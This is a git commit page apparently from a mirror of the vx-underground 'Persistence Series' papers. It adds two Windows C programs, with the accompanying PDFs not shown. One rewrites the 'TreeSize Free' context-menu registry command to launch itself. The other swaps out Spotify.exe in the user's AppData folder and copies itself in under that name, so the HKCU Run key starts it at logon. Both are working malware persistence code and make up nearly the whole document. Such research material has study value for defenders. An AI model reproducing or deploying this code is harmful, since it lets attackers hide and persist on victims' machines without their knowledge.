daniel/VXUG-Papers
1
0
Fork 0
mirror of https://github.com/vxunderground/VXUG-Papers.git synced 2026-06-15 07:19:24 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2020-10-11 00:56:40 -05:00
committed by GitHub
parent ff8a5c6f3d
commit 31e7869386
4 changed files with 315 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
The Persistence Series/Commandeering Context Menu Entries/CommandeeringContextMenuEntries.c
+200
View File
@@ -0,0 +1,200 @@
#include <windows.h>
#include <Psapi.h>
#include <stdio.h>
#define WCHAR_MAXPATH (MAX_PATH * sizeof(WCHAR))
DWORD HijackContextMenu(VOID);
BOOL DoIExist(VOID);
int main(VOID)
{
DWORD dwReturn = ERROR_SUCCESS;
dwReturn = HijackContextMenu();
if (dwReturn != ERROR_SUCCESS && dwReturn != ERROR_FILE_EXISTS)
{
return dwReturn;
}
if (DoIExist())
{
MessageBoxA(NULL, "", "", MB_OK);
ExitProcess(GetLastError());
}
while (TRUE)
{
Sleep(1000);
}
return ERROR_SUCCESS;
}
BOOL DoIExist(VOID)
{
DWORD dwProcesses[1024] = { 0 };
WCHAR wPath[WCHAR_MAXPATH] = { 0 };
DWORD wPathSize = WCHAR_MAXPATH;
DWORD dwNeeded = 0;
DWORD dwProcess = 0;
DWORD dwCount = 0;
if (!EnumProcesses(dwProcesses, sizeof(dwProcesses), &dwNeeded))
{
return FALSE;
}
if (GetModuleFileName(NULL, wPath, wPathSize) == 0)
{
return FALSE;
}
dwProcess = dwNeeded / sizeof(DWORD);
for (DWORD dwIndex = 0; dwIndex < dwProcess; dwIndex++)
{
WCHAR wModule[WCHAR_MAXPATH] = { 0 };
if (dwProcesses[dwIndex] != 0)
{
DWORD dwId = dwProcesses[dwIndex];
HANDLE hHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwId);
if (hHandle != NULL)
{
HMODULE hMod;
DWORD dwSize;
if (EnumProcessModules(hHandle, &hMod, sizeof(hMod), &dwSize))
{
GetModuleBaseName(hHandle, hMod, wModule, (sizeof(wModule) / sizeof(WCHAR)));
if (wcsstr(wPath, wModule) != NULL)
{
dwCount++;
if (dwCount > 1)
{
return TRUE;
}
}
}
}
if (hHandle)
{
CloseHandle(hHandle);
}
}
}
return FALSE;
}
DWORD HijackContextMenu(VOID)
{
HKEY hKey = HKEY_CLASSES_ROOT;
WCHAR lpSubKey[WCHAR_MAXPATH] = L"Directory\\Background\\shell";
HKEY hOpenKey = NULL;
HKEY phkResult;
DWORD dwSubKeys;
if (RegOpenKeyEx(hKey, lpSubKey, 0, KEY_ALL_ACCESS, &phkResult) != ERROR_SUCCESS)
{
return GetLastError();
}
if (RegQueryInfoKey(phkResult, NULL, NULL, NULL, &dwSubKeys, NULL, NULL, NULL, NULL, NULL, NULL, NULL) != ERROR_SUCCESS)
{
goto EXIT_ROUTINE;
}
for (DWORD i = 0; i < dwSubKeys; i++)
{
DWORD Enum;
WCHAR lpName[WCHAR_MAXPATH] = { 0 };
WCHAR lpFullName[WCHAR_MAXPATH] = { 0 };
DWORD lpcchName = WCHAR_MAXPATH;
hOpenKey = 0;
WCHAR bValue[WCHAR_MAXPATH] = L"CALC.EXE";
WCHAR pvData[2048] = { 0 };
WCHAR wModulePath[WCHAR_MAXPATH] = { 0 };
Enum = RegEnumKeyExW(phkResult, i, lpName, &lpcchName, NULL, NULL, NULL, NULL);
if (Enum != ERROR_SUCCESS && Enum != ERROR_NO_MORE_ITEMS)
{
goto EXIT_ROUTINE;
}
if (wcsstr(lpName, L"TreeSize Free") != NULL)
{
wcscat(lpName, L"\\command");
if (RegOpenKeyEx(phkResult, lpName, 0, KEY_ALL_ACCESS, &hOpenKey) != ERROR_SUCCESS)
{
goto EXIT_ROUTINE;
}
Enum = 2048;
if (RegGetValue(hOpenKey, NULL, NULL, RRF_RT_REG_SZ, NULL, pvData, &Enum) != ERROR_SUCCESS)
{
goto EXIT_ROUTINE;
}
if (GetModuleFileName(NULL, bValue, WCHAR_MAXPATH) == 0)
{
goto EXIT_ROUTINE;
}
if (wcscmp(bValue, pvData) == ERROR_SUCCESS)
{
if (phkResult)
{
RegCloseKey(phkResult);
}
if (hOpenKey)
{
RegCloseKey(hOpenKey);
}
return ERROR_FILE_EXISTS;
}
if (RegSetValueEx(hOpenKey, NULL, 0, REG_SZ, (PBYTE)bValue, sizeof(bValue)) != ERROR_SUCCESS)
{
goto EXIT_ROUTINE;
}
if (hOpenKey)
{
RegCloseKey(hOpenKey);
}
break;
}
}
if (phkResult)
{
RegCloseKey(phkResult);
}
return ERROR_SUCCESS;
EXIT_ROUTINE:
if (phkResult)
{
RegCloseKey(phkResult);
}
if (hOpenKey)
{
RegCloseKey(hOpenKey);
}
return GetLastError();
}
The Persistence Series/Commandeering Context Menu Entries/CommandeeringContextMenuEntries.pdf
BIN
View File
Binary file not shown.
The Persistence Series/Masquerading the HKCU Run Key/MasqueradingtheHKCURunKey.c
+115
View File
@@ -0,0 +1,115 @@
#include <windows.h>
#include <stdio.h>
#define WCHAR_MAXPATH (MAX_PATH * sizeof(WCHAR))
DWORD MasqueradeSpotifyKey(VOID);
int main(VOID)
{
DWORD dwError = ERROR_SUCCESS;
WCHAR wModulePath[WCHAR_MAXPATH] = { 0 };
if (GetModuleFileNameW(NULL, wModulePath, WCHAR_MAXPATH) == 0)
goto FAILURE;
if (wcsstr(wModulePath, L"Spotify") == NULL)
{
if (MasqueradeSpotifyKey() != ERROR_SUCCESS)
goto FAILURE;
}
else
MessageBoxA(NULL, "", "", MB_OK);
return ERROR_SUCCESS;
FAILURE:
dwError = GetLastError();
return dwError;
}
DWORD MasqueradeSpotifyKey(VOID)
{
DWORD dwError = ERROR_SUCCESS;
WCHAR wModulePath[WCHAR_MAXPATH] = { 0 }, wNewPath[WCHAR_MAXPATH] = { 0 };
WCHAR wRegistryPath[WCHAR_MAXPATH] = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run";
HKEY hKey = NULL, hHive = HKEY_CURRENT_USER;
BOOL bFlag = FALSE;
dwError = (LRESULT)RegOpenKeyExW(hHive, wRegistryPath, 0, KEY_ALL_ACCESS, &hKey);
if (dwError != ERROR_SUCCESS)
goto FAILURE;
for (; dwError < 256; dwError++)
{
DWORD dwReturn = 0, lpType = 0, dwValueSize = WCHAR_MAXPATH, dwDataSize = WCHAR_MAXPATH;
BYTE lpData[WCHAR_MAXPATH] = { 0 };
WCHAR wString[WCHAR_MAXPATH] = { 0 };
WCHAR lpValue[WCHAR_MAXPATH] = { 0 };
dwReturn = (LSTATUS)RegEnumValueW(hKey, dwError, lpValue, &dwValueSize, NULL, &lpType, lpData, &dwDataSize);
if (dwReturn != ERROR_SUCCESS && dwError != ERROR_NO_MORE_ITEMS)
goto FAILURE;
if (lpType != REG_SZ)
continue;
swprintf(wString, L"%ws", lpData);
if (wcsstr(wString, L"Spotify") != NULL)
{
bFlag = TRUE;
break;
}
}
if (!bFlag)
{
SetLastError(ERROR_FILE_NOT_FOUND);
goto FAILURE;
}
if (GetEnvironmentVariableW(L"APPDATA", wModulePath, WCHAR_MAXPATH) == 0)
goto FAILURE;
wcscat(wModulePath, L"\\Spotify\\Spotify.exe");
if (GetEnvironmentVariableW(L"APPDATA", wNewPath, WCHAR_MAXPATH) == 0)
goto FAILURE;
wcscat(wNewPath, L"\\Spotify\\RealSpotify.exe");
if (!MoveFile(wModulePath, wNewPath))
goto FAILURE;
ZeroMemory(wModulePath, WCHAR_MAXPATH); ZeroMemory(wNewPath, WCHAR_MAXPATH);
if (GetModuleFileNameW(NULL, wModulePath, WCHAR_MAXPATH) == 0)
goto FAILURE;
if (GetEnvironmentVariableW(L"APPDATA", wNewPath, WCHAR_MAXPATH) == 0)
goto FAILURE;
wcscat(wNewPath, L"\\Spotify\\Spotify.exe");
if (!CopyFile(wModulePath, wNewPath, TRUE))
goto FAILURE;
if (hKey)
RegCloseKey(hKey);
return ERROR_SUCCESS;
FAILURE:
dwError = GetLastError();
if (hKey)
RegCloseKey(hKey);
return dwError;
}
The Persistence Series/Masquerading the HKCU Run Key/MasqueradingtheHKCURunKey.pdf
BIN
View File
Binary file not shown.